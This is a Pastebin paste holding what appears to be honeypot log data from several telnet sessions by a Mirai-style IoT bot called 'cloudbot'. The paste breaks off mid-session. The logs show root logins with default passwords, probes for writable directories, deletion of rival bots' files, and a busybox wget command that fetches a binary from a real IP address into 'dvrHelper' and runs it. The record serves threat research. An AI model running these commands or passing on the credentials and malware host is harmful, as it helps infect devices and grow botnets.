SHARE
TWEET

cloudbot/AirDropBot @0xrb

a guest Sep 30th, 2019 67 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. {
  2.     "datas": [],
  3.     "inputs": {
  4.         "2c08de6f5477": [
  5.             {
  6.                 "eventid": "command.input",
  7.                 "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  8.                 "timestamp": "2019-08-06T17:32:46.672Z"
  9.             },
  10.             {
  11.                 "eventid": "command.input",
  12.                 "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  13.                 "timestamp": "2019-08-06T17:32:46.399Z"
  14.             },
  15.             {
  16.                 "eventid": "command.input",
  17.                 "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  18.                 "timestamp": "2019-08-06T17:32:41.469Z"
  19.             },
  20.             {
  21.                 "eventid": "command.input",
  22.                 "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  23.                 "timestamp": "2019-08-06T17:32:41.199Z"
  24.             },
  25.             {
  26.                 "eventid": "command.input",
  27.                 "input": "/bin/busybox ECCHI",
  28.                 "timestamp": "2019-08-06T17:32:40.927Z"
  29.             },
  30.             {
  31.                 "eventid": "command.input",
  32.                 "input": "/bin/busybox cat /bin/echo",
  33.                 "timestamp": "2019-08-06T17:32:40.642Z"
  34.             },
  35.             {
  36.                 "eventid": "command.input",
  37.                 "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  38.                 "timestamp": "2019-08-06T17:32:40.364Z"
  39.             },
  40.             {
  41.                 "eventid": "command.input",
  42.                 "input": "cd /",
  43.                 "timestamp": "2019-08-06T17:32:40.363Z"
  44.             },
  45.             {
  46.                 "eventid": "command.input",
  47.                 "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  48.                 "timestamp": "2019-08-06T17:32:40.361Z"
  49.             },
  50.             {
  51.                 "eventid": "command.input",
  52.                 "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  53.                 "timestamp": "2019-08-06T17:32:40.356Z"
  54.             },
  55.             {
  56.                 "eventid": "command.input",
  57.                 "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  58.                 "timestamp": "2019-08-06T17:32:40.353Z"
  59.             },
  60.             {
  61.                 "eventid": "command.input",
  62.                 "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  63.                 "timestamp": "2019-08-06T17:32:40.35Z"
  64.             },
  65.             {
  66.                 "eventid": "command.input",
  67.                 "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  68.                 "timestamp": "2019-08-06T17:32:40.347Z"
  69.             },
  70.             {
  71.                 "eventid": "command.input",
  72.                 "input": "rm /.t; rm /.sh; rm /.human",
  73.                 "timestamp": "2019-08-06T17:32:40.345Z"
  74.             },
  75.             {
  76.                 "eventid": "command.input",
  77.                 "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  78.                 "timestamp": "2019-08-06T17:32:40.34Z"
  79.             },
  80.             {
  81.                 "eventid": "command.input",
  82.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  83.                 "timestamp": "2019-08-06T17:32:39.689Z"
  84.             },
  85.             {
  86.                 "eventid": "command.input",
  87.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  88.                 "timestamp": "2019-08-06T17:32:39.684Z"
  89.             },
  90.             {
  91.                 "eventid": "command.input",
  92.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  93.                 "timestamp": "2019-08-06T17:32:39.677Z"
  94.             },
  95.             {
  96.                 "eventid": "command.input",
  97.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  98.                 "timestamp": "2019-08-06T17:32:39.671Z"
  99.             },
  100.             {
  101.                 "eventid": "command.input",
  102.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  103.                 "timestamp": "2019-08-06T17:32:39.461Z"
  104.             }
  105.         ],
  106.         "33837076c101": [
  107.             {
  108.                 "eventid": "command.input",
  109.                 "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  110.                 "timestamp": "2019-08-06T17:34:02.945Z"
  111.             },
  112.             {
  113.                 "eventid": "command.input",
  114.                 "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  115.                 "timestamp": "2019-08-06T17:34:02.742Z"
  116.             },
  117.             {
  118.                 "eventid": "command.input",
  119.                 "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  120.                 "timestamp": "2019-08-06T17:34:00.825Z"
  121.             },
  122.             {
  123.                 "eventid": "command.input",
  124.                 "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  125.                 "timestamp": "2019-08-06T17:34:00.622Z"
  126.             },
  127.             {
  128.                 "eventid": "command.input",
  129.                 "input": "/bin/busybox ECCHI",
  130.                 "timestamp": "2019-08-06T17:34:00.386Z"
  131.             },
  132.             {
  133.                 "eventid": "command.input",
  134.                 "input": "/bin/busybox cat /bin/echo",
  135.                 "timestamp": "2019-08-06T17:34:00.161Z"
  136.             },
  137.             {
  138.                 "eventid": "command.input",
  139.                 "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  140.                 "timestamp": "2019-08-06T17:33:59.737Z"
  141.             },
  142.             {
  143.                 "eventid": "command.input",
  144.                 "input": "cd /",
  145.                 "timestamp": "2019-08-06T17:33:59.735Z"
  146.             },
  147.             {
  148.                 "eventid": "command.input",
  149.                 "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  150.                 "timestamp": "2019-08-06T17:33:59.732Z"
  151.             },
  152.             {
  153.                 "eventid": "command.input",
  154.                 "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  155.                 "timestamp": "2019-08-06T17:33:59.725Z"
  156.             },
  157.             {
  158.                 "eventid": "command.input",
  159.                 "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  160.                 "timestamp": "2019-08-06T17:33:59.722Z"
  161.             },
  162.             {
  163.                 "eventid": "command.input",
  164.                 "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  165.                 "timestamp": "2019-08-06T17:33:59.719Z"
  166.             },
  167.             {
  168.                 "eventid": "command.input",
  169.                 "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  170.                 "timestamp": "2019-08-06T17:33:59.716Z"
  171.             },
  172.             {
  173.                 "eventid": "command.input",
  174.                 "input": "rm /.t; rm /.sh; rm /.human",
  175.                 "timestamp": "2019-08-06T17:33:59.712Z"
  176.             },
  177.             {
  178.                 "eventid": "command.input",
  179.                 "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  180.                 "timestamp": "2019-08-06T17:33:59.706Z"
  181.             },
  182.             {
  183.                 "eventid": "command.input",
  184.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  185.                 "timestamp": "2019-08-06T17:33:58.538Z"
  186.             },
  187.             {
  188.                 "eventid": "command.input",
  189.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  190.                 "timestamp": "2019-08-06T17:33:58.531Z"
  191.             },
  192.             {
  193.                 "eventid": "command.input",
  194.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  195.                 "timestamp": "2019-08-06T17:33:58.523Z"
  196.             },
  197.             {
  198.                 "eventid": "command.input",
  199.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  200.                 "timestamp": "2019-08-06T17:33:58.515Z"
  201.             },
  202.             {
  203.                 "eventid": "command.input",
  204.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  205.                 "timestamp": "2019-08-06T17:33:58.38Z"
  206.             },
  207.             {
  208.                 "eventid": "command.input",
  209.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  210.                 "timestamp": "2019-08-06T17:33:58.365Z"
  211.             },
  212.             {
  213.                 "eventid": "command.input",
  214.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  215.                 "timestamp": "2019-08-06T17:33:58.357Z"
  216.             },
  217.             {
  218.                 "eventid": "command.input",
  219.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  220.                 "timestamp": "2019-08-06T17:33:58.351Z"
  221.             },
  222.             {
  223.                 "eventid": "command.input",
  224.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  225.                 "timestamp": "2019-08-06T17:33:58.344Z"
  226.             },
  227.             {
  228.                 "eventid": "command.input",
  229.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  230.                 "timestamp": "2019-08-06T17:33:58.337Z"
  231.             },
  232.             {
  233.                 "eventid": "command.input",
  234.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  235.                 "timestamp": "2019-08-06T17:33:58.322Z"
  236.             },
  237.             {
  238.                 "eventid": "command.input",
  239.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  240.                 "timestamp": "2019-08-06T17:33:58.315Z"
  241.             },
  242.             {
  243.                 "eventid": "command.input",
  244.                 "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  245.                 "timestamp": "2019-08-06T17:33:57.634Z"
  246.             },
  247.             {
  248.                 "eventid": "command.input",
  249.                 "input": "/bin/busybox ps; /bin/busybox ECCHI",
  250.                 "timestamp": "2019-08-06T17:33:57.425Z"
  251.             },
  252.             {
  253.                 "eventid": "command.input",
  254.                 "input": "bash",
  255.                 "timestamp": "2019-08-06T17:33:56.465Z"
  256.             },
  257.             {
  258.                 "eventid": "command.input",
  259.                 "input": "terminal",
  260.                 "timestamp": "2019-08-06T17:33:56.463Z"
  261.             },
  262.             {
  263.                 "eventid": "command.input",
  264.                 "input": "linuxshell",
  265.                 "timestamp": "2019-08-06T17:33:56.461Z"
  266.             },
  267.             {
  268.                 "eventid": "command.input",
  269.                 "input": "sh",
  270.                 "timestamp": "2019-08-06T17:33:56.459Z"
  271.             },
  272.             {
  273.                 "eventid": "command.input",
  274.                 "input": "shell",
  275.                 "timestamp": "2019-08-06T17:33:56.455Z"
  276.             },
  277.             {
  278.                 "eventid": "command.input",
  279.                 "input": "enable",
  280.                 "timestamp": "2019-08-06T17:33:56.244Z"
  281.             },
  282.             {
  283.                 "eventid": "login.success",
  284.                 "geoip": {
  285.                     "city_name": "",
  286.                     "country_name": "Netherlands"
  287.                 },
  288.                 "password": "t0talc0ntr0l4!",
  289.                 "timestamp": "2019-08-06T17:33:55.628Z",
  290.                 "username": "root"
  291.             }
  292.         ],
  293.         "8f610699f8d2": [
  294.             {
  295.                 "eventid": "command.input",
  296.                 "input": "/bin/busybox ECCHI",
  297.                 "timestamp": "2019-08-06T17:33:26.74Z"
  298.             },
  299.             {
  300.                 "eventid": "command.input",
  301.                 "input": "/bin/busybox cat /bin/echo",
  302.                 "timestamp": "2019-08-06T17:33:26.437Z"
  303.             },
  304.             {
  305.                 "eventid": "command.input",
  306.                 "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  307.                 "timestamp": "2019-08-06T17:33:26.288Z"
  308.             },
  309.             {
  310.                 "eventid": "command.input",
  311.                 "input": "cd /",
  312.                 "timestamp": "2019-08-06T17:33:26.286Z"
  313.             },
  314.             {
  315.                 "eventid": "command.input",
  316.                 "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  317.                 "timestamp": "2019-08-06T17:33:26.28Z"
  318.             },
  319.             {
  320.                 "eventid": "command.input",
  321.                 "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  322.                 "timestamp": "2019-08-06T17:33:26.271Z"
  323.             },
  324.             {
  325.                 "eventid": "command.input",
  326.                 "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  327.                 "timestamp": "2019-08-06T17:33:26.266Z"
  328.             },
  329.             {
  330.                 "eventid": "command.input",
  331.                 "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  332.                 "timestamp": "2019-08-06T17:33:26.26Z"
  333.             },
  334.             {
  335.                 "eventid": "command.input",
  336.                 "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  337.                 "timestamp": "2019-08-06T17:33:26.257Z"
  338.             },
  339.             {
  340.                 "eventid": "command.input",
  341.                 "input": "rm /.t; rm /.sh; rm /.human",
  342.                 "timestamp": "2019-08-06T17:33:26.249Z"
  343.             },
  344.             {
  345.                 "eventid": "command.input",
  346.                 "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  347.                 "timestamp": "2019-08-06T17:33:26.241Z"
  348.             },
  349.             {
  350.                 "eventid": "command.input",
  351.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  352.                 "timestamp": "2019-08-06T17:33:25.931Z"
  353.             },
  354.             {
  355.                 "eventid": "command.input",
  356.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  357.                 "timestamp": "2019-08-06T17:33:25.922Z"
  358.             },
  359.             {
  360.                 "eventid": "command.input",
  361.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  362.                 "timestamp": "2019-08-06T17:33:25.908Z"
  363.             },
  364.             {
  365.                 "eventid": "command.input",
  366.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  367.                 "timestamp": "2019-08-06T17:33:25.897Z"
  368.             },
  369.             {
  370.                 "eventid": "command.input",
  371.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  372.                 "timestamp": "2019-08-06T17:33:25.725Z"
  373.             },
  374.             {
  375.                 "eventid": "command.input",
  376.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  377.                 "timestamp": "2019-08-06T17:33:25.697Z"
  378.             },
  379.             {
  380.                 "eventid": "command.input",
  381.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  382.                 "timestamp": "2019-08-06T17:33:25.686Z"
  383.             },
  384.             {
  385.                 "eventid": "command.input",
  386.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  387.                 "timestamp": "2019-08-06T17:33:25.675Z"
  388.             },
  389.             {
  390.                 "eventid": "command.input",
  391.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  392.                 "timestamp": "2019-08-06T17:33:25.665Z"
  393.             },
  394.             {
  395.                 "eventid": "command.input",
  396.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  397.                 "timestamp": "2019-08-06T17:33:25.65Z"
  398.             },
  399.             {
  400.                 "eventid": "command.input",
  401.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  402.                 "timestamp": "2019-08-06T17:33:25.629Z"
  403.             },
  404.             {
  405.                 "eventid": "command.input",
  406.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  407.                 "timestamp": "2019-08-06T17:33:25.616Z"
  408.             },
  409.             {
  410.                 "eventid": "command.input",
  411.                 "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  412.                 "timestamp": "2019-08-06T17:33:25.456Z"
  413.             },
  414.             {
  415.                 "eventid": "command.input",
  416.                 "input": "/bin/busybox ps; /bin/busybox ECCHI",
  417.                 "timestamp": "2019-08-06T17:33:25.301Z"
  418.             },
  419.             {
  420.                 "eventid": "command.input",
  421.                 "input": "bash",
  422.                 "timestamp": "2019-08-06T17:33:24.959Z"
  423.             },
  424.             {
  425.                 "eventid": "command.input",
  426.                 "input": "terminal",
  427.                 "timestamp": "2019-08-06T17:33:24.958Z"
  428.             },
  429.             {
  430.                 "eventid": "command.input",
  431.                 "input": "linuxshell",
  432.                 "timestamp": "2019-08-06T17:33:24.951Z"
  433.             },
  434.             {
  435.                 "eventid": "command.input",
  436.                 "input": "sh",
  437.                 "timestamp": "2019-08-06T17:33:24.95Z"
  438.             },
  439.             {
  440.                 "eventid": "command.input",
  441.                 "input": "shell",
  442.                 "timestamp": "2019-08-06T17:33:24.948Z"
  443.             },
  444.             {
  445.                 "eventid": "command.input",
  446.                 "input": "enable",
  447.                 "timestamp": "2019-08-06T17:33:24.779Z"
  448.             },
  449.             {
  450.                 "eventid": "login.success",
  451.                 "geoip": {
  452.                     "city_name": "",
  453.                     "country_name": "Netherlands"
  454.                 },
  455.                 "password": "t0talc0ntr0l4!",
  456.                 "timestamp": "2019-08-06T17:33:23.629Z",
  457.                 "username": "root"
  458.             }
  459.         ],
  460.         "c3aee80c84a8": [
  461.             {
  462.                 "eventid": "command.input",
  463.                 "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  464.                 "timestamp": "2019-08-06T17:34:43.292Z"
  465.             },
  466.             {
  467.                 "eventid": "command.input",
  468.                 "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  469.                 "timestamp": "2019-08-06T17:34:43.014Z"
  470.             },
  471.             {
  472.                 "eventid": "command.input",
  473.                 "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  474.                 "timestamp": "2019-08-06T17:33:54.963Z"
  475.             },
  476.             {
  477.                 "eventid": "command.input",
  478.                 "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  479.                 "timestamp": "2019-08-06T17:33:54.681Z"
  480.             },
  481.             {
  482.                 "eventid": "command.input",
  483.                 "input": "/bin/busybox ECCHI",
  484.                 "timestamp": "2019-08-06T17:33:53.801Z"
  485.             },
  486.             {
  487.                 "eventid": "command.input",
  488.                 "input": "/bin/busybox cat /bin/echo",
  489.                 "timestamp": "2019-08-06T17:33:52.543Z"
  490.             },
  491.             {
  492.                 "eventid": "command.input",
  493.                 "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  494.                 "timestamp": "2019-08-06T17:33:52.254Z"
  495.             },
  496.             {
  497.                 "eventid": "command.input",
  498.                 "input": "cd /",
  499.                 "timestamp": "2019-08-06T17:33:52.252Z"
  500.             },
  501.             {
  502.                 "eventid": "command.input",
  503.                 "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  504.                 "timestamp": "2019-08-06T17:33:52.25Z"
  505.             },
  506.             {
  507.                 "eventid": "command.input",
  508.                 "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  509.                 "timestamp": "2019-08-06T17:33:52.245Z"
  510.             },
  511.             {
  512.                 "eventid": "command.input",
  513.                 "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  514.                 "timestamp": "2019-08-06T17:33:52.242Z"
  515.             },
  516.             {
  517.                 "eventid": "command.input",
  518.                 "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  519.                 "timestamp": "2019-08-06T17:33:52.24Z"
  520.             },
  521.             {
  522.                 "eventid": "command.input",
  523.                 "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  524.                 "timestamp": "2019-08-06T17:33:52.237Z"
  525.             },
  526.             {
  527.                 "eventid": "command.input",
  528.                 "input": "rm /.t; rm /.sh; rm /.human",
  529.                 "timestamp": "2019-08-06T17:33:52.235Z"
  530.             },
  531.             {
  532.                 "eventid": "command.input",
  533.                 "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  534.                 "timestamp": "2019-08-06T17:33:52.23Z"
  535.             },
  536.             {
  537.                 "eventid": "command.input",
  538.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  539.                 "timestamp": "2019-08-06T17:33:51.627Z"
  540.             },
  541.             {
  542.                 "eventid": "command.input",
  543.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  544.                 "timestamp": "2019-08-06T17:33:51.622Z"
  545.             },
  546.             {
  547.                 "eventid": "command.input",
  548.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  549.                 "timestamp": "2019-08-06T17:33:51.615Z"
  550.             },
  551.             {
  552.                 "eventid": "command.input",
  553.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  554.                 "timestamp": "2019-08-06T17:33:51.609Z"
  555.             },
  556.             {
  557.                 "eventid": "command.input",
  558.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  559.                 "timestamp": "2019-08-06T17:33:51.367Z"
  560.             },
  561.             {
  562.                 "eventid": "command.input",
  563.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  564.                 "timestamp": "2019-08-06T17:33:51.355Z"
  565.             },
  566.             {
  567.                 "eventid": "command.input",
  568.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  569.                 "timestamp": "2019-08-06T17:33:51.35Z"
  570.             },
  571.             {
  572.                 "eventid": "command.input",
  573.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  574.                 "timestamp": "2019-08-06T17:33:51.345Z"
  575.             },
  576.             {
  577.                 "eventid": "command.input",
  578.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  579.                 "timestamp": "2019-08-06T17:33:51.34Z"
  580.             },
  581.             {
  582.                 "eventid": "command.input",
  583.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  584.                 "timestamp": "2019-08-06T17:33:51.335Z"
  585.             },
  586.             {
  587.                 "eventid": "command.input",
  588.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  589.                 "timestamp": "2019-08-06T17:33:51.324Z"
  590.             },
  591.             {
  592.                 "eventid": "command.input",
  593.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  594.                 "timestamp": "2019-08-06T17:33:51.319Z"
  595.             },
  596.             {
  597.                 "eventid": "command.input",
  598.                 "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  599.                 "timestamp": "2019-08-06T17:33:46.938Z"
  600.             },
  601.             {
  602.                 "eventid": "command.input",
  603.                 "input": "/bin/busybox ps; /bin/busybox ECCHI",
  604.                 "timestamp": "2019-08-06T17:33:46.039Z"
  605.             },
  606.             {
  607.                 "eventid": "command.input",
  608.                 "input": "bash",
  609.                 "timestamp": "2019-08-06T17:33:44.818Z"
  610.             },
  611.             {
  612.                 "eventid": "command.input",
  613.                 "input": "terminal",
  614.                 "timestamp": "2019-08-06T17:33:44.816Z"
  615.             },
  616.             {
  617.                 "eventid": "command.input",
  618.                 "input": "linuxshell",
  619.                 "timestamp": "2019-08-06T17:33:44.814Z"
  620.             },
  621.             {
  622.                 "eventid": "command.input",
  623.                 "input": "sh",
  624.                 "timestamp": "2019-08-06T17:33:44.813Z"
  625.             },
  626.             {
  627.                 "eventid": "command.input",
  628.                 "input": "shell",
  629.                 "timestamp": "2019-08-06T17:33:44.811Z"
  630.             },
  631.             {
  632.                 "eventid": "command.input",
  633.                 "input": "enable",
  634.                 "timestamp": "2019-08-06T17:33:44.526Z"
  635.             },
  636.             {
  637.                 "eventid": "login.success",
  638.                 "geoip": {
  639.                     "city_name": "",
  640.                     "country_name": "Netherlands"
  641.                 },
  642.                 "password": "vizxv",
  643.                 "timestamp": "2019-08-06T17:33:43.696Z",
  644.                 "username": "root"
  645.             }
  646.         ],
  647.         "e551f86e07d6": [
  648.             {
  649.                 "eventid": "command.input",
  650.                 "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  651.                 "timestamp": "2019-08-06T17:34:33.79Z"
  652.             },
  653.             {
  654.                 "eventid": "command.input",
  655.                 "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  656.                 "timestamp": "2019-08-06T17:34:33.55Z"
  657.             },
  658.             {
  659.                 "eventid": "command.input",
  660.                 "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  661.                 "timestamp": "2019-08-06T17:34:27.41Z"
  662.             },
  663.             {
  664.                 "eventid": "command.input",
